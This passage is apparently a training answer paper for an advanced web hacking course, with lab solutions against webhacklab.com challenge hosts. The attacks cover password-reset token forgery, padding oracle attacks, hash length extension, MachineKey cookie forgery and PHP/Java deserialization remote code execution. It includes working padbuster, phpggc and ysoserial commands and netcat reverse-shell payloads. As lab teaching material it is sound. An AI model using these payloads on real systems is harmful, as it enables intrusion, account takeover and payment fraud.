Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
37 views101 pages

AnswerSheet Part2

The document is a training answer paper for Advanced Web Hacking, detailing various attack methodologies such as Known Plaintext Attack, Padding Oracle Attack, and Remote Code Execution techniques. It provides step-by-step solutions for exploiting vulnerabilities in web applications, including password reset hijacking and decrypting ciphertexts. Each module includes practical examples and commands for executing the attacks effectively.

Uploaded by

Jack
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
37 views101 pages

AnswerSheet Part2

The document is a training answer paper for Advanced Web Hacking, detailing various attack methodologies such as Known Plaintext Attack, Padding Oracle Attack, and Remote Code Execution techniques. It provides step-by-step solutions for exploiting vulnerabilities in web applications, including password reset hijacking and decrypting ciphertexts. Each module includes practical examples and commands for executing the attacks effectively.

Uploaded by

Jack
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 101

||||||||||||||||||||

Advanced Web Hacking (Part 2)

Answer
Paper
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Contents
Module: Breaking Crypto ..................................................................................................... 2

Known Plaintext Attack ................................................................................................. 2

Padding Oracle Attack .................................................................................................. 6

Exploiting padding oracles with fixed IVs..................................................................... 14

Hash length extension Attack ...................................................................................... 20

Auth Bypass using pre-shared MachineKey ................................................................ 31

Module: Remote Code Execution (RCE) ........................................................................... 39

PHP Object Injection ................................................................................................... 39

PHP Deserialization Attack ......................................................................................... 43

Java Deserialization Attack - Binary ............................................................................ 48

Bonus: Tricky Java Deserialization Attack - Binary ...................................................... 54

Java Deserialization Attack - XML ............................................................................... 69

Jackson JSON Deserialization Attack ......................................................................... 76

.NET Serialization Attack............................................................................................. 80

Python Serialization Attack.......................................................................................... 87

Bonus: Plex Python Deserialization ............................................................................. 93

Ruby/ERB Template Injection ..................................................................................... 97

Page: | 1

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Breaking Crypto

Known Plaintext Attack


Challenge URL: http://topup.webhacklab.com/Account/ForgotPassword

• Reset the password of the user “[email protected]” by generating a valid


password reset link

Solution:
Step 1: Initiate the forgot password request as user
[email protected]” into the topup application:

Step 2: The user will receive the password reset link with a “token” in the registered email as shown
below:

Page: | 2

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

http://topup.webhacklab.com/Account/ResetPassword?code=6cD0nQOLXoX5XlJubw3SIDDXSu5
K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/&userId=b19d4b82-56ad-407d-9191-
9715c1698166

Send another password reset request for the same username and notice that the token in the
password reset link remains constant.

Step 3: Register another account with email “[email protected]” and


request a password reset for this account. Convert the token to Hex as described below, we can
notice that portion of the Hex is same for both the accounts, suggesting that the encryption algorithm
in use generates the same output for a given plain text:

http://topup.webhacklab.com/Account/ResetPassword?userId=b314960e-dbaf-4979-b841-
0c6b175c3dab&code=%2BvheISv88Uo85l4reA7D%2BDDXSu5K9u5roALwtIEGJc8hCFop2kCH4
j6LceF2P8D%2F

User : [email protected]

Token Value = +vheISv88Uo85l4reA7D+DDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/

Base64 to Bytes to Hex:

root@Kali:~# echo
"+vheISv88Uo85l4reA7D+DDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/" | base64 -d
| xxd -p

Hex Value =
FAF85E212BFCF14A3CE65E2B780EC3F830D74AEE4AF6EE6BA002F0B4810625CF21085A29D
A4087E23E8B71E1763FC0FF

Page: | 3

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Based on the analysis in last step hijack the account “[email protected]” by
registering another account [email protected] and trimming off the
first 16 bytes from the password reset token of this user and creating a password reset link for
[email protected]” :

User : [email protected]

Token Value =6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/

Base64 to Bytes to Hex:

root@Kali:~# echo
"6cD0nQOLXoX5XlJubw3SIDDXSu5K9u5roALwtIEGJc8hCFop2kCH4j6LceF2P8D/" | base64 -
d | xxd -p

Hex Value =
E9C0F49D038B5E85F95E526E6F0DD22030D74AEE4AF6EE6BA002F0B4810625CF21085A29DA
4087E23E8B71E1763FC0FF

Password Reset token for [email protected] user is

Hex Value = 30D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF

Hex to Bytes to Base64:

root@Kali:~# echo
"30D74AEE4AF6EE6BA002F0B4810625CF21085A29DA4087E23E8B71E1763FC0FF" | xxd -r -p
| base64

Base64 Encoded Token Value = MNdK7kr27mugAvC0gQYlzyEIWinaQIfiPotx4XY/wP8=

Page: | 4

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Navigate to
http://topup.webhacklab.com/Account/ResetPassword?code=MNdK7kr27mugAvC0gQYlzyEI
WinaQIfiPotx4XY/wP8=&userId=b314960e-dbaf-4979-b841-0c6b175c3dab and change the
password of user “[email protected]”:

Step 6: The Figure shows that the application allowed to change the password using the token

Page: | 5

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Padding Oracle Attack


Challenge URL: http://topup.webhacklab.com/download.aspx?invoice={ciphertext_invoice}

Identify a padding oracle vulnerability to:

• Decrypt the ciphertext for the invoice parameter.


• Encrypt the payload to download the content of the “web.config” file from the server

Solution:
The application takes an encrypted parameter filename to retrieve invoice details from the server.

Step 1: When a valid ciphertext value is passed to the filename parameter, the application returns
the content of a file as shown in the figure below.

http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrf
HVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA==

Page: | 6

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: When an invalid ciphertext value is passed to the filename parameter, it responds with bad
padding error.

http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYg
w6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBaA==

This behaviour can further be used to identify whether the encrypted value has proper padding or
not.

Step 3: Padbuster tool can be used to automate the padding oracle attacks. Decrypt ciphertext
using the following command:

./padbuster.pl
"http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1L
WrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA=="
"hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP8
82ywGBkA==" 16 -encoding 0 -error "Padding"

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following


[+] Status: 200
[+] Location: N/A
[+] Content Length: 6895

INFO: Starting PadBuster Decrypt Mode

Page: | 7

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

*** Starting Block 1 of 3 ***

[+] Success: (156/256) [Byte 16]


[+] Success: (160/256) [Byte 15]
[+] Success: (75/256) [Byte 14]
[+] Success: (238/256) [Byte 13]
[+] Success: (104/256) [Byte 12]
[+] Success: (63/256) [Byte 11]
[+] Success: (189/256) [Byte 10]
[+] Success: (71/256) [Byte 9]
[+] Success: (23/256) [Byte 8]
[+] Success: (203/256) [Byte 7]
[+] Success: (183/256) [Byte 6]
[+] Success: (33/256) [Byte 5]
[+] Success: (229/256) [Byte 4]
[+] Success: (93/256) [Byte 3]
[+] Success: (191/256) [Byte 2]
[+] Success: (95/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): b7da75dd4b5ab7c756e620c3a00021d5
[+] Intermediate Bytes (HEX): b14ead16d3423fe0b144c79d16b66265
[+] Plain Text: 42ba14117a724295

*** Starting Block 2 of 3 ***

[+] Success: (29/256) [Byte 16]


[+] Success: (191/256) [Byte 15]
[+] Success: (202/256) [Byte 14]
[+] Success: (62/256) [Byte 13]
[+] Success: (1/256) [Byte 12]
[+] Success: (240/256) [Byte 11]
[+] Success: (40/256) [Byte 10]
[+] Success: (149/256) [Byte 9]
[+] Success: (5/256) [Byte 8]
[+] Success: (118/256) [Byte 7]
[+] Success: (151/256) [Byte 6]
[+] Success: (140/256) [Byte 5]
[+] Success: (30/256) [Byte 4]
[+] Success: (225/256) [Byte 3]
[+] Success: (28/256) [Byte 2]
[+] Success: (59/256) [Byte 1]

Page: | 8

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Block 2 Results:
[+] Cipher Text (HEX): 2ddfe3e1aa3139274863d6ebbd79df30
[+] Intermediate Bytes (HEX): d5eb11ef786280f263df16fac63543e2
[+] Plain Text: b1d238755969f5b7

*** Starting Block 3 of 3 ***

[+] Success: (198/256) [Byte 16]


[+] Success: (42/256) [Byte 15]
[+] Success: (143/256) [Byte 14]
[+] Success: (78/256) [Byte 13]
[+] Success: (27/256) [Byte 12]
[+] Success: (37/256) [Byte 11]
[+] Success: (145/256) [Byte 10]
[+] Success: (181/256) [Byte 9]
[+] Success: (219/256) [Byte 8]
[+] Success: (200/256) [Byte 7]
[+] Success: (207/256) [Byte 6]
[+] Success: (54/256) [Byte 5]
[+] Success: (127/256) [Byte 4]
[+] Success: (103/256) [Byte 3]
[+] Success: (72/256) [Byte 2]
[+] Success: (237/256) [Byte 1]

Block 3 Results:
[+] Cipher Text (HEX): 709bd7a45bc220c3043fcf36cb018190
[+] Intermediate Bytes (HEX): 03b7978cc63a322c4368dde0b672d43b
[+] Plain Text: .html

-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): 42ba14117a724295b1d238755969f5b7.html

[+] Decrypted value (HEX):


34326261313431313761373234323935623164323338373535393639663562372E68746D6C0B0B
0B0B0B0B0B0B0B0B0B

[+] Decrypted value (Base64):


NDJiYTE0MTE3YTcyNDI5NWIxZDIzODc1NTk2OWY1YjcuaHRtbAsLCwsLCws

Page: | 9

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: padding-oracle-attacker tool can be used to automate the padding oracle attacks.
Decrypt ciphertext using the following command:

padding-oracle-attacker decrypt "http://topup.webhacklab.com/download.aspx?invoice="


b64:hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIM
MEP882ywGBkA== 16 Padding -e base64

Page: | 10

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Encrypt payload to download arbitrary files (web.config in this case)

Step 4: Run padbuster with "-plaintext" argument to create a ciphertext for the plaintext
"../web.config"

./padbuster.pl
"http://topup.webhacklab.com/download.aspx?invoice=hXzPd+J2DtGGJfCvIoRbULfadd1
LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP882ywGBkA=="
"hXzPd+J2DtGGJfCvIoRbULfadd1LWrfHVuYgw6AAIdUt3+PhqjE5J0hj1uu9ed8wcJvXpFvCIMMEP
882ywGBkA==" 16 -encoding 0 -error "Padding" -plaintext ../../web.config

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following


[+] Status: 200
[+] Location: N/A
[+] Content Length: 643

INFO: Starting PadBuster Encrypt Mode


[+] Number of Blocks: 2

[+] Success: (212/256) [Byte 16]


[+] Success: (196/256) [Byte 15]
[+] Success: (44/256) [Byte 14]
[+] Success: (219/256) [Byte 13]
[+] Success: (223/256) [Byte 12]
[+] Success: (26/256) [Byte 11]
[+] Success: (109/256) [Byte 10]
[+] Success: (118/256) [Byte 9]
[+] Success: (235/256) [Byte 8]
[+] Success: (142/256) [Byte 7]
[+] Success: (231/256) [Byte 6]
[+] Success: (142/256) [Byte 5]
[+] Success: (215/256) [Byte 4]
[+] Success: (82/256) [Byte 3]
[+] Success: (124/256) [Byte 2]
[+] Success: (209/256) [Byte 1]

Page: | 11

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Block 2 Results:
[+] New Cipher Text (HEX): 2f9bb0346e02680c9284f03431c72e3d
[+] Intermediate Bytes (HEX): 3f8ba0247e12781c8294e02421d73e2d

[+] Success: (26/256) [Byte 16]


[+] Success: (125/256) [Byte 15]
[+] Success: (45/256) [Byte 14]
[+] Success: (93/256) [Byte 13]
[+] Success: (251/256) [Byte 12]
[+] Success: (158/256) [Byte 11]
[+] Success: (194/256) [Byte 10]
[+] Success: (31/256) [Byte 9]
[+] Success: (7/256) [Byte 8]
[+] Success: (63/256) [Byte 7]
[+] Success: (239/256) [Byte 6]
[+] Success: (107/256) [Byte 5]
[+] Success: (140/256) [Byte 4]
[+] Success: (105/256) [Byte 3]
[+] Success: (206/256) [Byte 2]
[+] Success: (185/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 7913b657b735bc958b17076fc9b6e880
[+] Intermediate Bytes (HEX): 573d9979991acbf0e9396400a7d081e7

-------------------------------------------------------
** Finished ***

[+] Encrypted value is:


eRO2V7c1vJWLFwdvybbogC%2BbsDRuAmgMkoTwNDHHLj0AAAAAAAAAAAAAAAAAAAAA
-------------------------------------------------------

Page: | 12

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: Run padding-oracle-attacker with "encrypt" argument to create a ciphertext for the
plaintext "../../web.config"

padding-oracle-attacker encrypt "http://topup.webhacklab.com/download.aspx?invoice="


"../../web.config" 16 Padding -e base64

Step 5: Open the following URL to view the contents of the web.config file in HTML source.

view-
source:http://topup.webhacklab.com/download.aspx?invoice=eRO2V7c1vJWLFwdvybbogC%2Bb
sDRuAmgMkoTwNDHHLj0AAAAAAAAAAAAAAAAAAAAA

Page: | 13

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Exploiting padding oracles with fixed IVs


Challenge URL: http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile

• Access the file where id=0 which can only be accessible by an admin.

Solution:
Step 1: Log in to the application and click on the 'support' button and click on the 'View' link as
shown in Figure:

Step 2: To view the file content uploaded along with a support ticket when it’s created. It is required
to click on the link mentioned in 'FileName' column as shown in figure:

Page: | 14

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Upon clicking on the link of the above step, the application sends a request to the server
which contains file id in the 'id' parameter and user token. If user token is valid and file id belongs to
logged in user then application responds with file content of supplied id parameter as shown in
figure:

Step 4: Based on the exercise challenge if we directly try to access a file where id=0 then the
application responds with 'File not found!!' error message as shown in Figure:

Page: | 15

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: To access a file where id=0, it is required to send the token which belongs to the user who is
owning a file where id=0. To achieve this, we have to modify the token but when we try to modify
token application respond with 'padding error' as shown in the figure:

Step 6: Let’s try to decrypt the token using Padbuster utility as shown in figure:

Command:

./padbuster.pl
"http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=X&token=
$TOKEN$" "$TOKEN$" 16 -encoding 1 -cookies
.AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$ -error "Padding"

Page: | 16

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: Let’s try to decrypt the token using padding-oracle-attacker utility as shown in figure:

Command:

padding-oracle-attacker decrypt
"http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=X&token=
" "hex:$TOKEN$" -H "Cookie: .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$"
16 Padding -e hex

Page: | 17

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Try to create token where ‘"user":"admin"’ using padbuster as shown in figure:

Command:

./padbuster.pl
"http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=0&token=
$TOKEN$" "$TOKEN$" 16 -encoding 1 -cookies
.AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$ -error "Padding" -plaintext
'","user":"admin"}'

Page: | 18

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: Try to create token where ‘"user":"admin"’ using padding-oracle-attacker as shown in


figure:

Command:

padding-oracle-attacker encrypt
"http://reimbursement.webhacklab.com/Support/LoadSupportTicketFile?id=0token="
-H "Cookie: .AspNet.ApplicationCookie=$SESSION_COOKIE_VALUE$"
'","user":"admin"}' 16 Padding -e hex

Step 8: Now take the 1st 2 blocks i.e. 32 bytes (64 hex characters) of the original token and append
it with the newly generated arbitrary text as shown above to access id=0.

Page: | 19

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Hash length extension Attack


Challenge URL: http://topup.webhacklab.com/Shop/Topup [Payment]

• Buy a topup at less than total payable amount using your registered account.

Solution:
Step 1: Login and navigate to the topup feature of the recharge application. Select a topup and
initiate the payment process.

Step 2: Intercept the request and send this request to Repeater

Page: | 20

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Notice that payment amount from the original request is being displayed in the response.

Page: | 21

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: By tampering the values of different parameters we can identify that the application gives an
error message “Hash validation failed” when the “transactionid”, “email” or “amount” parameters are
tampered.

Note: This suggests that the “hash” might be using the values of these three parameters, however
generating hashes of these parameters combined does not match the value of “hash”. The reason
for this could be a secret being used for hash generation along with these values.

Page: | 22

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Using the tool “hash_extender” generate multiple hashes with different padding length using
the following command. Notice that we want to change the price from ‘279’ to ‘10’

root@Kali:~/tools/hash_extender# ./hash_extender --data


[email protected] --secret-min 8 --
secret-max 18 --append 10 --signature 584e373b3c9c5aa6b3ede1129a848083 --
format md5 --out-data-format html –table

Where,
--data = It’s a combination of transactionid+email+amount
--signature = It’s a value of the hash parameter from the request

Page: | 23

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Send the HTTP Request captured in Step 2 to Intruder.

Step 7: Create the Intruder payload as shown below.

Payload Value: Starting from the email address till last NULL byte (%00) without amount parameter
value.

Page: | 24

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Replace the hash parameter value from the payload generated in Step 5.

Page: | 25

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Select the 'email' parameter as injection point, change the value of the amount parameter
form '279' to '10'.

Page: | 26

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Select the padded values generated by the tool starting from the email address till last
NULL byte (%00) from Step 7 and paste them in the payload list. Also, make sure to uncheck the
option to 'URL encode' the special characters.

Page: | 27

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Start the intruder attack and notice that one of the payloads was successful.

Step 12: Modify the initial payment request captured in Step 2, replace POST body with successful
payload from Step 11. The response will show that the amount we need to pay is now 10 GBP
(instead of 279 GBP).

Page: | 28

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Enter credit card details and complete the transaction.

Step 14: Go to “My Orders” section and check the amount. Notice that the price shown is 279 GBP.

Page: | 29

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 15: You will receive a payment receipt to your registered email, indicating transaction number,
status and the total amount paid (10 GBP in this case).

Page: | 30

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Auth Bypass using pre-shared


MachineKey
Challenge URL: http://admin.webhacklab.com/

• Identify a pre-shared Machine Key used in the application using “Blacklist3r”


• Create a new auth token for “admin” user and gain access to the administrative
console
• Use http://utility.webhacklab.com/ to generate payloads

Solution:
Step 1: Navigate to the “http://admin.webhacklab.com/Home/About” page to access the admin
interface.

Step 2: As the user is not authenticated, it will redirect to the login page.

Page: | 31

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: On following the redirect, it is observed that the application sets multiple cookie values, one
of which is “.ASPXAUTH”. The cookie “.ASPXAUTH” is used to establish the user identity and is
signed and encrypted.

Step 4: Using the “Blacklist3r” utility we will verify if the application uses a pre-shared machine key
available in Blacklist3r’s database. Once verified, it will decrypt the auth cookie and store it in a file.
The file contains two interesting fields holding value (anonymous) highlighted, as shown below.

Page: | 32

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: You can decrypt the cookie using the web interface URL of Blacklist3r:
http://utility.webhacklab.com/Blacklister.aspx.

Page: | 33

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: The next task is to find a valid user based on which we can use the Blackist3r utility to
create a valid auth token. The login page is vulnerable to username enumeration. For an invalid
username, it returns “Invalid username and password” default error message.

Step 6: However, for a valid username and invalid password, it returns “Invalid password” error
message. Using this we can identify that “admin” is a valid user in the application.

Page: | 34

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Once the valid user is found change the username and role information in decrypted file
generated in Step 4 and re-generate the cookie using the Blacklist3r terminal utility based on the
modified information.

Page: | 35

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: To perform this activity on the web utility change the username and role information in
decrypted information panel in Step 4 and re-generate the cookie based on the modified
information.

Page: | 36

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Once we have the new cookie, access the admin panel home page and intercept the
request.

Step 9: Capture the request using Burp Suite.

Step 10: Replace the cookie value generated with the newly generated cookie.

Page: | 37

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: The cookie is accepted by the server and we have access to the admin panel.

Page: | 38

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Remote Code


Execution (RCE)

PHP Object Injection


Challenge URL: http://shop.webhacklab.com/help.php

• Exploit a PHP object injection instance to access “/etc/passwd” file from the server.

Solution:
Step 1: Navigate to the application “http://shop.webhacklab.com” and click on the “Help” link in the
footer and then the “Refund & Cancellation Policies” page as shown below

Page: | 39

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Lets us now investigate the “file” parameter in the URL as seen in the screenshot below

Step 3: Copy the value of the file parameter in the URL and paste it in Burpsuite’s Decoder interface
and decode the value as Base64 as shown below.

This looks like a PHP serialized object array which is referencing a file named “refund.html” from the
system.

Page: | 40

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: In order to carry out the attack we need to modify the serialized object but we need to know
the correct class name and the parameter names of the object which is being serialized. Let's view
the HTML source of the application. Upon viewing the source it can be observed that there is a
commented class definition which is being used for referencing the file as shown below.

Step 5: Let us now modify this Serialized object array to reference a different file from the system as
part of our challenge i.e. “/etc/passwd” as shown below. The modification must be in line with the
PHPs serialization requirements

Page: | 41

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Copy the encoded Base64 value from the above step and paste it as the value of the file
parameter and the server now deserializes the modified PHP Object and reads the “/etc/passwd”
file as shown below

Page: | 42

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

PHP Deserialization Attack


Challenge URL: http://slim.webhacklab.com:8081

• Identify and exploit the PHP Deserialization vulnerability.


• Get a reverse shell and extract the system information such as username, OS type
from the server.

Solution:
Step 1: Navigate to the “http://slim.webhacklab.com:8081/” and provide the details such as first
name, last name and mobile number and email address:

Page: | 43

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: We further intercepted above request and decoded base64 value of parameter “csrftoken”
suggesting that serialized data was used:

Step 3: Open a terminal and execute the phpggc located at ‘/root/tools/phpggc/’. The command to
generate a PHP serialized payload to execute command “id” is :

root@Kali:~/tools/phpgcc# ./phpggc -b slim/rce1 system id

Page: | 44

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Provide the base64 encoded payload retrieved from above step to parameter “csrftoken”
and submit the request. On successful execution, the application reveals the output of the “id”
command

Step 5: In order to take a reverse shell open the terminal and start a listener:

root@Kali:~# nc -nlvp 9999

Page: | 45

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Create a php serialized payload to get a reverse shell using the command :

root@Kali:~/tools/phpgcc# ./phpggc -b slim/rce1 system "ncat 192.168.4.X 9999


-e /bin/bash"

Step 7: Provide the base64 encoded payload retrieved from above step to parameter “csrftoken”
and submit the request.

Page: | 46

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: On successful execution the application sends a reverse shell on the listener and can
execute commands.

Page: | 47

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Java Deserialization Attack - Binary


Challenge URL: http://mblog.webhacklab.com/login

• Identify and inject a payload into the serialised data to make the host send DNS
requests to an external host.
• Get a reverse shell and extract the system information such as usernames, OS type
from the server and also read “/etc/passwd” file.

Solution:
Step 1: Login into the application with “Remember Me” checked.

Page: | 48

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Observe a new cookie being set in response of the Login request named “rememberMe”

Note: Upon inspection of the value “rememberMe” cookie as shown above, we can identify that the
value of cookie starts with “rO0AB” and indicates that it could be a Java Serialised object.

Step 3: Start “tcpdump” on your kali VM to dump dns requests, using the following command:

tcpdump -n udp port 53 -i any

Step 4: Generate the payload using tool “ysoserial-master.jar” to perform the action using the below
command:

root@Kali:~/tools# java -jar ysoserial-master.jar CommonsCollections4


'nslookup foo.userX.webhacklab.com' | base64 | tr -d "\n"

Page: | 49

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Copy the payload we generated in the above step and paste this entire payload in the
“rememberMe” cookie and observe the command execution on the server.

Step 6: As can be seen from the screenshot below, we received domain resolution requests on our
internal kali host confirming command execution.

Page: | 50

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Generate the payload using tool ‘ysoserial-master.jar’ to perform the action of taking a
reverse shell using the below command:

root@Kali:~/tools# java -jar ysoserial-master.jar CommonsCollections4 'nc -e


/bin/sh 192.168.4.X 9898' | base64 | tr -d "\n"

Step 8: Start a “nc listener” to wait for reverse shell

Page: | 51

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Copy the payload we generated in the above step and paste this entire payload in the
rememberme cookie and observe the command execution on the server.

Page: | 52

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: As can be seen from the screenshot below, we received a reverse shell on our internal kali
host confirming command execution.

Page: | 53

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Bonus: Tricky Java Deserialization Attack


- Binary
Challenge URL: http://mblognew.webhacklab.com/login

• Identify and inject a payload into the serialised data to make the host send DNS
requests to an external host.
• Get a reverse shell and extract system information such as usernames, OS type from
the server and also read the ‘/etc/passwd’ file.

Solution:
Step 1: Register to the application, navigate to the login page, provide credentials, and tick the
'Remember Me' checkbox and click on submit button.

Page: | 54

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Once you have successfully logged in to the application, navigate to any of the tabs 'Home',
'Profile', 'Notification' or 'Settings'.

Step 3: Capture the HTTP Request in Burp Suite and observe the 'rememberMe' cookie value
which has Base64 encoded data

Page: | 55

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: It contains unreadable data but when its Base64 decoded the cookie value, and the value
will be as shown in figure

Note: Always try different encoding and encryption mechanisms when there is such type of Base64
data.

Step 5: Observe that the application passes Java serialized value after Base64 decode and then
decompresses it using deflate using the 'Hackvertor' Burp Suite extension as shown in figure:

Page: | 56

©
